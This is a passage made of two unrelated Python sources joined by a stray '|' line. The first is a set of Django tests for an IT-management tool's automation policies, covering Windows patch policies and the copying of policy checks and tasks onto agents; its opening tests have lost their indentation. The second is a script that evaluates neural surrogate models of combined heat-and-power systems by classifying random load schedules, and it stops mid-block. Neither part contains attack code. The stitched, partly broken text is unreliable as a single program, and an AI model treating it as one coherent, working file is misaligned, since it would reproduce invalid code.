serializer = RelatedSitePolicySerializer(site)
resp = self.client.patch(url, site_payload, format="json")
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data, serializer.data)
# test agent relation get
serializer = RelatedAgentPolicySerializer(agent)
resp = self.client.patch(url, agent_payload, format="json")
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data, serializer.data)
invalid_payload = {"type": "bad_type", "pk": 5}
resp = self.client.patch(url, invalid_payload, format="json")
self.assertEqual(resp.status_code, 400)
self.check_not_authenticated("patch", url)
def test_get_policy_task_status(self):
# policy with a task
policy = baker.make("automation.Policy")
task = baker.make("autotasks.AutomatedTask", policy=policy)
# create policy managed tasks
policy_tasks = baker.make(
"autotasks.AutomatedTask", parent_task=task.id, _quantity=5
)
url = f"/automation/policyautomatedtaskstatus/{task.id}/task/"
serializer = PolicyTaskStatusSerializer(policy_tasks, many=True)
resp = self.client.patch(url, format="json")
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data, serializer.data)
self.assertEqual(len(resp.data), 5)
self.check_not_authenticated("patch", url)
@patch("automation.tasks.run_win_policy_autotask_task.delay")
def test_run_win_task(self, mock_task):
# create managed policy tasks
tasks = baker.make(
"autotasks.AutomatedTask",
managed_by_policy=True,
parent_task=1,
_quantity=6,
)
url = "/automation/runwintask/1/"
resp = self.client.put(url, format="json")
self.assertEqual(resp.status_code, 200)
mock_task.assert_called_once_with([task.pk for task in tasks])
self.check_not_authenticated("put", url)
def test_create_new_patch_policy(self):
    """POST /automation/winupdatepolicy/ creates a patch policy for an automation policy."""
    endpoint = "/automation/winupdatepolicy/"

    # referencing a non-existent policy is rejected with 404
    response = self.client.post(endpoint, {"policy": 500}, format="json")
    self.assertEqual(response.status_code, 404)

    target_policy = baker.make("automation.Policy")
    payload = {
        "policy": target_policy.pk,
        "critical": "approve",
        "important": "approve",
        "moderate": "ignore",
        "low": "ignore",
        "other": "approve",
        "run_time_hour": 3,
        "run_time_frequency": "daily",
        "run_time_days": [0, 3, 5],
        "run_time_day": "15",
        "reboot_after_install": "always",
    }
    response = self.client.post(endpoint, payload, format="json")
    self.assertEqual(response.status_code, 200)

    self.check_not_authenticated("post", endpoint)
def test_update_patch_policy(self):
    """PUT /automation/winupdatepolicy/<pk>/ updates an existing patch policy."""
    # unknown pk -> 404
    response = self.client.put("/automation/winupdatepolicy/500/", format="json")
    self.assertEqual(response.status_code, 404)

    parent_policy = baker.make("automation.Policy")
    existing = baker.make("winupdate.WinUpdatePolicy", policy=parent_policy)
    endpoint = f"/automation/winupdatepolicy/{existing.pk}/"
    payload = {
        "id": existing.pk,
        "policy": parent_policy.pk,
        "critical": "approve",
        "important": "approve",
        "moderate": "ignore",
        "low": "ignore",
        "other": "approve",
        "run_time_days": [4, 5, 6],
    }
    response = self.client.put(endpoint, payload, format="json")
    self.assertEqual(response.status_code, 200)

    self.check_not_authenticated("put", endpoint)
def test_reset_patch_policy(self):
    """PATCH /automation/winupdatepolicy/reset/ reverts agent patch settings to 'inherit'.

    The reset endpoint is exercised at three scopes — a single site, a whole
    client, and all agents. After each call, every affected agent's
    WinUpdatePolicy must have all override fields back at their inherit values.
    """
    url = "/automation/winupdatepolicy/reset/"
    inherit_fields = {
        "critical": "inherit",
        "important": "inherit",
        "moderate": "inherit",
        "low": "inherit",
        "other": "inherit",
        "run_time_frequency": "inherit",
        "reboot_after_install": "inherit",
        "reprocess_failed_inherit": True,
    }

    def assert_reset(agent_qs):
        # every agent in the queryset must be fully back on inherited settings
        for agent in agent_qs:
            win_policy = agent.winupdatepolicy.get()
            for field, value in inherit_fields.items():
                self.assertEqual(getattr(win_policy, field), value)

    clients = baker.make("clients.Client", _quantity=6)
    sites = baker.make("clients.Site", client=cycle(clients), _quantity=10)
    agents = baker.make_recipe(
        "agents.agent",
        site=cycle(sites),
        _quantity=6,
    )
    # give each agent a non-inherited ("approve") patch policy to reset
    baker.make_recipe(
        "winupdate.winupdate_approve", agent=cycle(agents), _quantity=6
    )

    # test reset agents in site
    resp = self.client.patch(url, {"site": sites[0].id}, format="json")
    self.assertEqual(resp.status_code, 200)
    assert_reset(Agent.objects.filter(site=sites[0]))

    # test reset agents in client
    resp = self.client.patch(url, {"client": clients[1].id}, format="json")
    self.assertEqual(resp.status_code, 200)
    assert_reset(Agent.objects.filter(site__client=clients[1]))

    # test reset all agents (empty payload)
    resp = self.client.patch(url, {}, format="json")
    self.assertEqual(resp.status_code, 200)
    assert_reset(Agent.objects.all())

    self.check_not_authenticated("patch", url)
def test_delete_patch_policy(self):
    """DELETE /automation/winupdatepolicy/<pk>/ removes the patch policy row."""
    # unknown pk -> 404
    response = self.client.delete("/automation/winupdatepolicy/500/", format="json")
    self.assertEqual(response.status_code, 404)

    patch_policy = baker.make_recipe(
        "winupdate.winupdate_policy", policy__name="Test Policy"
    )
    endpoint = f"/automation/winupdatepolicy/{patch_policy.pk}/"

    response = self.client.delete(endpoint, format="json")
    self.assertEqual(response.status_code, 200)
    # the row must be gone from the database
    self.assertFalse(WinUpdatePolicy.objects.filter(pk=patch_policy.pk).exists())

    self.check_not_authenticated("delete", endpoint)
class TestPolicyTasks(TacticalTestCase):
    """Tests for the automation-policy celery tasks that generate, update and
    delete agent checks/tasks from policies."""

    def setUp(self):
        self.authenticate()
        self.setup_coresettings()

    def test_policy_related(self):
        """/related/ lists the distinct clients, sites and agents of a policy."""
        # 5 clients x 5 sites each; one server and one workstation agent per site
        clients = baker.make("clients.Client", _quantity=5)
        sites = baker.make("clients.Site", client=cycle(clients), _quantity=25)
        server_agents = baker.make_recipe(
            "agents.server_agent",
            site=cycle(sites),
            _quantity=25,
        )
        workstation_agents = baker.make_recipe(
            "agents.workstation_agent",
            site=cycle(sites),
            _quantity=25,
        )

        policy = baker.make("automation.Policy", active=True)

        # Add one client per agent type to the policy
        policy.server_clients.add(server_agents[13].client)
        policy.workstation_clients.add(workstation_agents[15].client)

        url = f"/automation/policies/{policy.pk}/related/"
        resp = self.client.get(url, format="json")
        self.assertEqual(resp.status_code, 200)
        self.assertEqual(len(resp.data["server_clients"]), 1)
        self.assertEqual(len(resp.data["server_sites"]), 5)
        self.assertEqual(len(resp.data["workstation_clients"]), 1)
        self.assertEqual(len(resp.data["workstation_sites"]), 5)
        self.assertEqual(len(resp.data["agents"]), 10)

        # Adding a site already covered through its client shouldn't change the
        # site or agent counts.
        # BUGFIX: the endpoint is re-queried after each mutation; the original
        # test re-asserted the stale response data, so these checks never
        # actually exercised the endpoint.
        policy.server_sites.add(server_agents[13].site)
        policy.workstation_sites.add(workstation_agents[15].site)
        resp = self.client.get(url, format="json")
        self.assertEqual(len(resp.data["server_sites"]), 5)
        self.assertEqual(len(resp.data["workstation_sites"]), 5)
        self.assertEqual(len(resp.data["agents"]), 10)

        # Adding agents already covered shouldn't change the agent count either
        policy.agents.add(server_agents[13])
        policy.agents.add(workstation_agents[15])
        resp = self.client.get(url, format="json")
        self.assertEqual(len(resp.data["agents"]), 10)

    def test_generating_agent_policy_checks(self):
        """Policy checks are copied onto agents assigned to the policy."""
        from .tasks import generate_agent_checks_from_policies_task

        # setup data: one policy with the 7 standard checks and one agent
        policy = baker.make("automation.Policy", active=True)
        checks = self.create_checks(policy=policy)
        site = baker.make("clients.Site")
        agent = baker.make_recipe("agents.agent", site=site, policy=policy)

        generate_agent_checks_from_policies_task(policy.id, clear=True)

        # all 7 policy checks must have been copied onto the agent
        agent_checks = Agent.objects.get(pk=agent.id).agentchecks.all()
        self.assertEqual(len(agent_checks), 7)

        # every copy must reference its parent check and mirror its fields
        for check in agent_checks:
            self.assertTrue(check.managed_by_policy)
            if check.check_type == "diskspace":
                self.assertEqual(check.parent_check, checks[0].id)
                self.assertEqual(check.disk, checks[0].disk)
                self.assertEqual(check.threshold, checks[0].threshold)
            elif check.check_type == "ping":
                self.assertEqual(check.parent_check, checks[1].id)
                self.assertEqual(check.ip, checks[1].ip)
            elif check.check_type == "cpuload":
                self.assertEqual(check.parent_check, checks[2].id)
                self.assertEqual(check.threshold, checks[2].threshold)
            elif check.check_type == "memory":
                self.assertEqual(check.parent_check, checks[3].id)
                self.assertEqual(check.threshold, checks[3].threshold)
            elif check.check_type == "winsvc":
                self.assertEqual(check.parent_check, checks[4].id)
                self.assertEqual(check.svc_name, checks[4].svc_name)
                self.assertEqual(check.svc_display_name, checks[4].svc_display_name)
                self.assertEqual(check.svc_policy_mode, checks[4].svc_policy_mode)
            elif check.check_type == "script":
                self.assertEqual(check.parent_check, checks[5].id)
                self.assertEqual(check.script, checks[5].script)
            elif check.check_type == "eventlog":
                self.assertEqual(check.parent_check, checks[6].id)
                self.assertEqual(check.event_id, checks[6].event_id)
                self.assertEqual(check.event_type, checks[6].event_type)

    def test_generating_agent_policy_checks_with_enforced(self):
        """An enforced policy overrides matching checks that exist on the agent."""
        from .tasks import generate_agent_checks_from_policies_task

        # the policy and the agent both get the same 7 checks
        policy = baker.make("automation.Policy", active=True, enforced=True)
        script = baker.make_recipe("scripts.script")
        self.create_checks(policy=policy, script=script)
        site = baker.make("clients.Site")
        agent = baker.make_recipe("agents.agent", site=site, policy=policy)
        self.create_checks(agent=agent, script=script)

        generate_agent_checks_from_policies_task(policy.id, create_tasks=True)

        # the agent keeps its own 7 checks plus the 7 policy copies ...
        self.assertEqual(Agent.objects.get(pk=agent.id).agentchecks.count(), 14)
        # ... and each agent-owned check is flagged as overridden by the policy
        self.assertEqual(
            Agent.objects.get(pk=agent.id)
            .agentchecks.filter(overriden_by_policy=True)
            .count(),
            7,
        )

    def test_generating_agent_policy_checks_by_location(self):
        """Location-scoped check generation only touches agents matching the filter."""
        from .tasks import generate_agent_checks_by_location_task

        policy = baker.make("automation.Policy", active=True)
        self.create_checks(policy=policy)
        clients = baker.make(
            "clients.Client",
            _quantity=2,
            server_policy=policy,
            workstation_policy=policy,
        )
        sites = baker.make("clients.Site", client=cycle(clients), _quantity=4)
        server_agent = baker.make_recipe("agents.server_agent", site=sites[0])
        workstation_agent = baker.make_recipe("agents.workstation_agent", site=sites[2])
        agent1 = baker.make_recipe("agents.server_agent", site=sites[1])
        agent2 = baker.make_recipe("agents.workstation_agent", site=sites[3])

        # restrict generation to servers in sites[0]
        generate_agent_checks_by_location_task(
            {"site_id": sites[0].id},
            "server",
            clear=True,
            create_tasks=True,
        )
        # only server_agent should have received the policy checks
        self.assertEqual(Agent.objects.get(pk=server_agent.id).agentchecks.count(), 7)
        self.assertEqual(
            Agent.objects.get(pk=workstation_agent.id).agentchecks.count(), 0
        )
        self.assertEqual(Agent.objects.get(pk=agent1.id).agentchecks.count(), 0)

        # restrict generation to workstations of clients[0]
        generate_agent_checks_by_location_task(
            {"site__client_id": clients[0].id},
            "workstation",
            clear=True,
            create_tasks=True,
        )
        # workstation_agent gains checks; the server checks generated above stay
        self.assertEqual(
            Agent.objects.get(pk=workstation_agent.id).agentchecks.count(), 7
        )
        self.assertEqual(Agent.objects.get(pk=server_agent.id).agentchecks.count(), 7)
        self.assertEqual(Agent.objects.get(pk=agent1.id).agentchecks.count(), 0)
        self.assertEqual(Agent.objects.get(pk=agent2.id).agentchecks.count(), 0)

    def test_generating_policy_checks_for_all_agents(self):
        """Default policies set in CoreSettings apply to all agents of a type."""
        from .tasks import generate_all_agent_checks_task
        from core.models import CoreSettings

        policy = baker.make("automation.Policy", active=True)
        self.create_checks(policy=policy)
        site = baker.make("clients.Site")
        server_agents = baker.make_recipe("agents.server_agent", site=site, _quantity=3)
        workstation_agents = baker.make_recipe(
            "agents.workstation_agent", site=site, _quantity=4
        )

        # make the policy the global default for both agent types
        core = CoreSettings.objects.first()
        core.server_policy = policy
        core.workstation_policy = policy
        core.save()

        generate_all_agent_checks_task("server", clear=True, create_tasks=True)
        # only the servers have the 7 checks so far
        for agent in server_agents:
            self.assertEqual(Agent.objects.get(pk=agent.id).agentchecks.count(), 7)
        for agent in workstation_agents:
            self.assertEqual(Agent.objects.get(pk=agent.id).agentchecks.count(), 0)

        generate_all_agent_checks_task("workstation", clear=True, create_tasks=True)
        # now every agent has the 7 checks
        for agent in server_agents:
            self.assertEqual(Agent.objects.get(pk=agent.id).agentchecks.count(), 7)
        for agent in workstation_agents:
            self.assertEqual(Agent.objects.get(pk=agent.id).agentchecks.count(), 7)

    def test_delete_policy_check(self):
        """Deleting a policy check removes its copies from assigned agents."""
        from .tasks import delete_policy_check_task
        from .models import Policy

        policy = baker.make("automation.Policy", active=True)
        self.create_checks(policy=policy)
        site = baker.make("clients.Site")
        agent = baker.make_recipe("agents.server_agent", site=site, policy=policy)
        agent.generate_checks_from_policies()
        self.assertEqual(Agent.objects.get(pk=agent.id).agentchecks.count(), 7)

        # delete one policy check and make sure its agent copy disappears
        policy_check_id = Policy.objects.get(pk=policy.id).policychecks.first().id
        delete_policy_check_task(policy_check_id)

        self.assertEqual(Agent.objects.get(pk=agent.id).agentchecks.count(), 6)
        self.assertFalse(
            Agent.objects.get(pk=agent.id)
            .agentchecks.filter(parent_check=policy_check_id)
            .exists()
        )

    def test_update_policy_check_fields(self):
        """Editing a policy check propagates the new values to the agent copies.

        BUGFIX: this test was previously named ``update_policy_check_fields``
        (no ``test_`` prefix), so the test runner silently skipped it, and its
        final assertion read ``.ip`` off a QuerySet instead of a check object.
        """
        from .tasks import update_policy_check_fields_task
        from .models import Policy

        policy = baker.make("automation.Policy", active=True)
        self.create_checks(policy=policy)
        agent = baker.make_recipe("agents.server_agent", policy=policy)
        agent.generate_checks_from_policies()
        self.assertEqual(Agent.objects.get(pk=agent.id).agentchecks.count(), 7)

        # change the ping check's target ip and push the update to agents
        ping_check = (
            Policy.objects.get(pk=policy.id)
            .policychecks.filter(check_type="ping")
            .first()
        )
        ping_check.ip = "12.12.12.12"
        ping_check.save()
        update_policy_check_fields_task(ping_check.id)

        # the agent's copy (keyed by parent_check) must carry the new ip
        self.assertEqual(
            Agent.objects.get(pk=agent.id)
            .agentchecks.get(parent_check=ping_check.id)
            .ip,
            "12.12.12.12",
        )

    def test_generate_agent_tasks(self):
        """Policy automated tasks are copied onto agents assigned to the policy."""
        from .tasks import generate_agent_tasks_from_policies_task

        policy = baker.make("automation.Policy", active=True)
        tasks = baker.make(
            "autotasks.AutomatedTask", policy=policy, name=seq("Task"), _quantity=3
        )
        site = baker.make("clients.Site")
        agent = baker.make_recipe("agents.server_agent", site=site, policy=policy)

        generate_agent_tasks_from_policies_task(policy.id, clear=True)

        agent_tasks = Agent.objects.get(pk=agent.id).autotasks.all()
        self.assertEqual(len(agent_tasks), 3)
        # every copy must reference its parent task and keep its name
        for task in agent_tasks:
            self.assertTrue(task.managed_by_policy)
            if task.name == "Task1":
                self.assertEqual(task.parent_task, tasks[0].id)
                self.assertEqual(task.name, tasks[0].name)
            if task.name == "Task2":
                self.assertEqual(task.parent_task, tasks[1].id)
                self.assertEqual(task.name, tasks[1].name)
            if task.name == "Task3":
                self.assertEqual(task.parent_task, tasks[2].id)
                self.assertEqual(task.name, tasks[2].name)

    def test_generate_agent_tasks_by_location(self):
        """Location-scoped task generation only touches matching agents."""
        from .tasks import generate_agent_tasks_by_location_task

        policy = baker.make("automation.Policy", active=True)
        baker.make(
            "autotasks.AutomatedTask", policy=policy, name=seq("Task"), _quantity=3
        )
        clients = baker.make(
            "clients.Client",
            _quantity=2,
            server_policy=policy,
            workstation_policy=policy,
        )
        sites = baker.make("clients.Site", client=cycle(clients), _quantity=4)
        server_agent = baker.make_recipe("agents.server_agent", site=sites[0])
        workstation_agent = baker.make_recipe("agents.workstation_agent", site=sites[2])
        agent1 = baker.make_recipe("agents.agent", site=sites[1])
        agent2 = baker.make_recipe("agents.agent", site=sites[3])

        # servers in sites[0] only
        generate_agent_tasks_by_location_task(
            {"site_id": sites[0].id}, "server", clear=True
        )
        self.assertEqual(
            Agent.objects.get(pk=workstation_agent.id).autotasks.count(), 0
        )
        self.assertEqual(Agent.objects.get(pk=server_agent.id).autotasks.count(), 3)
        self.assertEqual(Agent.objects.get(pk=agent1.id).autotasks.count(), 0)
        self.assertEqual(Agent.objects.get(pk=agent2.id).autotasks.count(), 0)

        # workstations of clients[0] only
        generate_agent_tasks_by_location_task(
            {"site__client_id": clients[0].id}, "workstation", clear=True
        )
        self.assertEqual(
            Agent.objects.get(pk=workstation_agent.id).autotasks.count(), 3
        )
        self.assertEqual(Agent.objects.get(pk=server_agent.id).autotasks.count(), 3)
        self.assertEqual(Agent.objects.get(pk=agent1.id).autotasks.count(), 0)
        self.assertEqual(Agent.objects.get(pk=agent2.id).autotasks.count(), 0)

    @patch("autotasks.tasks.delete_win_task_schedule.delay")
    def test_delete_policy_tasks(self, delete_win_task_schedule):
        """Deleting a policy task schedules the deletion of its agent copies."""
        from .tasks import delete_policy_autotask_task

        policy = baker.make("automation.Policy", active=True)
        tasks = baker.make("autotasks.AutomatedTask", policy=policy, _quantity=3)
        site = baker.make("clients.Site")
        agent = baker.make_recipe("agents.server_agent", site=site, policy=policy)
        agent.generate_tasks_from_policies()

        delete_policy_autotask_task(tasks[0].id)
        # the win-task removal must be queued for the agent's copy
        delete_win_task_schedule.assert_called_with(agent.autotasks.first().id)

    @patch("autotasks.tasks.run_win_task.delay")
    def test_run_policy_task(self, run_win_task):
        """Running policy tasks queues a win-task run for each task id."""
        from .tasks import run_win_policy_autotask_task

        tasks = baker.make("autotasks.AutomatedTask", _quantity=3)
        run_win_policy_autotask_task([task.id for task in tasks])
        # FIX: removed a no-op assignment of run_win_task.side_effect that was
        # made *after* the call under test and therefore had no effect.
        self.assertEqual(run_win_task.call_count, 3)
        for task in tasks:
            run_win_task.assert_any_call(task.id)

    @patch("agents.models.Agent.nats_cmd")
    def test_update_policy_tasks(self, nats_cmd):
        """Editing a policy task's fields propagates to the agent copies."""
        from .tasks import update_policy_task_fields_task
        from autotasks.models import AutomatedTask

        nats_cmd.return_value = "ok"
        policy = baker.make("automation.Policy", active=True)
        tasks = baker.make(
            "autotasks.AutomatedTask", enabled=True, policy=policy, _quantity=3
        )
        site = baker.make("clients.Site")
        agent = baker.make_recipe("agents.server_agent", site=site, policy=policy)
        agent.generate_tasks_from_policies()

        tasks[0].enabled = False
        tasks[0].save()
        update_policy_task_fields_task(tasks[0].id, enabled=False)
        # the agent copy (parent_task == policy task id) must now be disabled
        self.assertFalse(AutomatedTask.objects.get(parent_task=tasks[0].id).enabled)
|
# --- setup: load trained surrogate networks and the matching simulation model
from typing import Tuple, Dict
import torch.multiprocessing as mp
# 'spawn' makes workers re-import this module instead of forking, which keeps
# torch state consistent across processes (second argument is force=True)
mp.set_start_method('spawn', True)
import sys, os
# make project-root imports (modules.*, learning.*) work when run as a script
if os.getcwd() not in sys.path: sys.path.append(os.getcwd())
import copy
import datetime
import logging
import logging.config
from learning.logging_config import logging_config
import numpy as np
np.set_printoptions(suppress=True)  # no scientific notation in logged arrays
import torch
import torch.nn as nn

# output directories of the trained state-transition and action models
state_model_location = 'learning/statebased/output/' + '2020-08-20_18-18-40_chpp_hwt_state'
action_model_location = 'learning/statebased/output/' + '2020-08-17_11-55-57_chpp_hwt_actions'

# load neural networks (including corresponding simulation model)
from modules.utils import load_neural_model
state_meta_data, state_nn_parameters, state_neural_network = load_neural_model(state_model_location)
action_meta_data, action_nn_parameters, action_neural_network = load_neural_model(action_model_location)
simulation_model = state_meta_data['model']
sampling_parameters = state_meta_data['sampling_parameters']
simulation_model.eval()

#""""
# HOTFIX for CHPP_HWT and DFH:
#
# This block is only required if the original experiment is repeated with the CHPP_HWT or DFH models provided in the repository.
# The heat demand data loaded from crest_heat_demand.txt during the training and saved into the simulation model was erroneous.
# This error did not affect the training process, but it does influence the evaluation results, making them look better than they should be.
# Newly trained models do not require this step.
#
with open('data/crest_heat_demand.txt', 'r') as file: # read data
    demand_series = np.loadtxt(file, delimiter='\t', skiprows=1) # read file, dismiss header
    demand_series = demand_series.transpose(1,0) # dim 0 identifies the series
    demand_series *= 1000 # kW -> W
    simulation_model.demand.demand_series = demand_series
# HOTFIX END
#""""

#
# parameters
#
evaluation_periods = [96,32,24,4]  # schedule prefix lengths (in time steps) to evaluate
time_step_count = 96  # full schedule length (presumably 24 h at 15-min steps — TODO confirm)
feasibility_threshold = 0.5  # ANN rating above which an action counts as feasible
simulation_model.constraint_fuzziness = 0.0  # strict constraints during evaluation
process_count = 24  # worker processes for the classification runs
schedule_count_random = 25000
schedule_count_reference = 25000
schedule_count_arbitrary = 50000

# CHPP systems: initial storage-temperature sampling distribution
# (HoLL uses a lower temperature band than the other CHPP models)
from modules.simulation.integrated.holl import HoLL
if type(simulation_model) is HoLL:
    sampling_parameters['temp_distribution'] = ([(35,40), (40,60), (60,65)], [1/20, 18/20, 1/20])
else:
    sampling_parameters['temp_distribution'] = ([(55,60), (60,80), (80,85)], [1/20, 18/20, 1/20])
# BESS systems: uniform state-of-charge sampling range
sampling_parameters['soc_distribution'] = ([(simulation_model.constraint_fuzziness, 1-simulation_model.constraint_fuzziness)], [1])
# EVSE systems: battery capacities to sample from (units not stated here — verify against the model)
sampling_parameters['possible_capacities'] = [17.6, 27.2, 36.8, 37.9, 52, 70, 85, 100]

logger = None  # configured in the __main__ guard below
if __name__ == '__main__':
    # log to a timestamped file next to this script, using a message-only format
    logging_config['handlers']['file']['filename'] = '{}/{}-log.txt'.format(os.path.dirname(__file__), datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S'))
    logging_config['formatters']['standard']['format'] = '%(message)s'
    logging.config.dictConfig(logging_config)
    logger = logging.getLogger('')  # root logger
    # record which trained models this evaluation run used
    logger.info(state_model_location)
    logger.info(action_model_location)
# create neural model
from modules.neuralnetwork.models.statebased import NeuralModel
def classify_by_interaction(model: NeuralModel, feasibility_threshold):
    # experimental
    # Alternative action classifier: rates each action by how far the resulting
    # grid interaction deviates from the requested action. Currently unused
    # (its spot in the NeuralModel(...) call below is commented out).
    actions = model.actions
    # NOTE(review): the `ratings` returned by batch_transition are immediately
    # overwritten on the next line — presumably discarded on purpose; confirm.
    state, interaction, ratings = model.batch_transition(actions)
    ratings = torch.abs(torch.Tensor(actions) - interaction[:,0])
    # returns normalized ratings and the actions whose deviation is below the
    # threshold scaled by the largest action magnitude.
    # NOTE(review): indexing `actions` with a torch boolean tensor requires
    # `actions` to be array-like with compatible indexing — verify its type.
    return ratings/max(ratings), actions[ratings < max(-min(actions), max(actions)) * feasibility_threshold]
# discrete action set shared by the simulation model and the surrogate
actions = simulation_model.actions
# surrogate combining the state-transition ANN with the action-feasibility ANN
# (classify_by_interaction is an unused alternative classifier, left commented)
neural_model = NeuralModel(state_meta_data['dt'], actions,
    state_neural_network, state_meta_data['input_processor'], state_meta_data['ann_output_processor'],
    #classify_by_interaction,
    action_neural_network, action_meta_data['input_processor'], action_meta_data['ann_output_processor'],
    feasibility_threshold=feasibility_threshold)

#
# test classification
#
from modules.simulation.simulationmodel import SimulationModel
def choose_arbitrary_action(logger, step, model: "SimulationModel", filter_list=None, **kwargs) -> Tuple[int, bool, Dict]:
    """Choose a uniformly random action, ignoring feasibility entirely.

    Args:
        logger: unused; kept for a uniform strategy signature.
        step: current time step; unused by this strategy.
        model: model providing the discrete action set ``model.actions``.
        filter_list: unused; kept for a uniform strategy signature.
            BUGFIX: was a mutable default argument ``[]``.
        **kwargs: ignored; strategies thread per-schedule state through kwargs.

    Returns:
        (chosen action, fallback flag (always False), kwargs for the next step)
    """
    return np.random.choice(model.actions), False, {}
def choose_action_randomly(logger, step, model: "SimulationModel", filter_list=None, **kwargs) -> Tuple[int, bool, Dict]:
    """Choose a uniformly random action from the model's feasible actions.

    Args:
        logger: logger used to report the fallback case.
        step: current time step; unused by this strategy.
        model: model providing ``feasible_actions``, ``actions`` and ``ratings``.
        filter_list: actions to exclude from the feasible set.
            BUGFIX: was a mutable default argument ``[]``.
        **kwargs: ignored; strategies thread per-schedule state through kwargs.

    Returns:
        (chosen action, fallback flag, kwargs for the next step). The fallback
        flag is True when no feasible action remained and the best-rated
        action was returned instead.
    """
    if filter_list is None:
        filter_list = []
    feasible_actions = np.setdiff1d(model.feasible_actions, filter_list)
    if len(feasible_actions) == 0:
        logger.info('Action selection fallback for state {}'.format(np.round(model.state, 4).tolist()))
        # BUGFIX: index the model's own action set; the original indexed a
        # module-level ``actions`` variable, inconsistent with
        # choose_action_using_reference and wrong for any other model argument.
        return model.actions[np.argmax(model.ratings)], True, {}
    return np.random.choice(feasible_actions), False, {}
def choose_action_using_reference(logger, step, model: "SimulationModel", filter_list=None,
        reference_schedule=None, reference_schedule_length=24, reference_schedule_step_length=4,
        reference_intervals=None, **kwargs) -> Tuple[int, bool, Dict]:
    """Choose a feasible action close to a (possibly random) reference schedule.

    The reference schedule assigns each step an interval index; the feasible
    action is drawn from a window around that interval, which is widened one
    interval at a time until it contains at least one feasible action.

    Args:
        logger: logger used to report the fallback case.
        step: current time step, indexing into ``reference_schedule``.
        model: model providing ``feasible_actions``, ``actions`` and ``ratings``.
        filter_list: actions to exclude from the feasible set.
            BUGFIX: was a mutable default argument ``[]``.
        reference_schedule: per-step interval indices; generated randomly once
            and threaded through the returned kwargs if not supplied.
        reference_schedule_length: number of coarse schedule blocks to generate.
        reference_schedule_step_length: time steps per coarse block.
        reference_intervals: boundaries of the action intervals; derived from
            the model's action range if not supplied.
        **kwargs: ignored extra strategy state.

    Returns:
        (chosen action, fallback flag, kwargs carrying the reference data to
        the next step).
    """
    if filter_list is None:
        filter_list = []
    if reference_intervals is None:
        actions = model.actions
        reference_intervals = np.linspace(min(actions), max(actions), 5)
    if reference_schedule is None:
        reference_schedule = np.random.choice(len(reference_intervals)-1, reference_schedule_length+1).repeat(reference_schedule_step_length)
        #reference_schedule = np.roll(reference_schedule, np.random.choice(reference_schedule_step_length))
    # carry the (possibly freshly generated) reference data to the next step
    next_kwargs = {
        'reference_schedule': reference_schedule,
        'reference_intervals': reference_intervals,
        'reference_schedule_length': reference_schedule_length,
        'reference_schedule_step_length': reference_schedule_step_length
    }
    feasible_actions = np.setdiff1d(model.feasible_actions, filter_list)
    if len(feasible_actions) == 0:
        logger.info('Action selection fallback for state {}'.format(np.round(model.state, 4).tolist()))
        return model.actions[np.argmax(model.ratings)], True, next_kwargs
    mask = []
    # widen the interval window around the reference until it contains at
    # least one feasible action
    for i in range(len(reference_intervals)):
        mask = (feasible_actions >= reference_intervals[max(0,reference_schedule[step]-i)])
        mask &= (feasible_actions <= reference_intervals[min(len(reference_intervals)-1, reference_schedule[step]+1+i)])
        if sum(mask) > 0:
            break
    return np.random.choice(feasible_actions[mask]), False, next_kwargs
# Generator Code
#
def classify_load_profile(neural_model, simulation_model, choose_action, time_step_count, sampling_parameters, logger):
    """
    Generates a load schedule from a neural model and evaluates it with the simulation model

    The schedule is built step by step with ``choose_action`` (which decides on
    the basis of the *simulation* model), while the *neural* model classifies
    each chosen action as feasible or infeasible.

    Returns a dict with:
        'infeasible_at': first step at which the chosen action was actually
            infeasible according to the simulation model
            (== time_step_count if the whole schedule was feasible)
        'classified_infeasible_at': first step at which the neural model
            classified the chosen action as infeasible
            (== time_step_count if it never did)
    """
    # make sure the random seeds are different in each process
    np.random.seed(int.from_bytes(os.urandom(4), byteorder='little'))
    # determine an initial state
    simulation_model.eval() # sample with eval() setting
    simulation_model.sample_state(**sampling_parameters)
    neural_model.load_state(simulation_model.state)
    simulation_model.train() # strict constraints (which the ANN should have learned)
    # do a forecast in order to predetermine the external input and the mask required to update inputs
    forecast, forecast_mask = simulation_model.forecast(time_step_count)
    # save initial states to restore them later
    result = {}
    kwargs = {}
    result['infeasible_at'] = time_step_count
    result['classified_infeasible_at'] = time_step_count
    for step in range(time_step_count):
        #result['_'] = step # DEBUG / Testing
        # feasibility as judged by the surrogate vs. the ground-truth model
        ann_feasible = neural_model.feasible_actions
        sim_feasible = simulation_model.feasible_actions
        # choose an action
        action_choice, fallback_action, kwargs = choose_action(logger, step, simulation_model, [], **kwargs)
        if not np.isin(action_choice, sim_feasible) and result['infeasible_at'] >= time_step_count:
            # infeasible action and therefore an infeasible load profile
            # an entry smaller than time_step_count means it has already been detected as infeasible
            result['infeasible_at'] = step
        if not np.isin(action_choice, ann_feasible):
            # action deemed infeasible
            # there is nothing left to do
            result['classified_infeasible_at'] = step
            break
        # while a not detected infeasibility is actually an error at this moment,
        # the remaining load schedule could still provide further indications that it is actually infeasible
        # (proceeding like this is also required for comparability with Bremer2015)
        state, interaction = neural_model.transition(action_choice)
        simulation_model.transition(action_choice)
        if step + 1 < time_step_count:
            # post processing to incorporate forecasts: overwrite the forecast-
            # masked components of the predicted state with the known inputs
            neural_model.state = state * (1-forecast_mask[step+1]) + forecast_mask[step+1] * forecast[step+1]
    #else:
    # reached final step without stopping due to a detected infeasibility
    return result
if __name__ == '__main__':
    logger.info('----------------------------------------------------------------')
    logger.info('Schedule classification')
    logger.info('----------------------------------------------------------------')
    logger.info('Feasibility threshold {}'.format(feasibility_threshold))
    logger.info('Constraint fuzziness {}'.format(simulation_model.constraint_fuzziness))
    import json  # NOTE(review): appears unused in this block — confirm before removing

    # classify schedules from each generation strategy in parallel; every
    # spawned worker receives its own copies of the models via starmap args
    logger.info('Testing {} arbitrary schedules'.format(schedule_count_arbitrary))
    with mp.Pool(processes=process_count) as pool:
        results_arbitrary = pool.starmap(classify_load_profile,
            [(neural_model, simulation_model, choose_arbitrary_action, time_step_count, sampling_parameters, logger) for i in range(schedule_count_arbitrary)])

    logger.info('Testing {} random strategy schedules'.format(schedule_count_random))
    with mp.Pool(processes=process_count) as pool:
        results_random = pool.starmap(classify_load_profile,
            [(neural_model, simulation_model, choose_action_randomly, time_step_count, sampling_parameters, logger) for i in range(schedule_count_random)])

    logger.info('Testing {} reference strategy schedules'.format(schedule_count_reference))
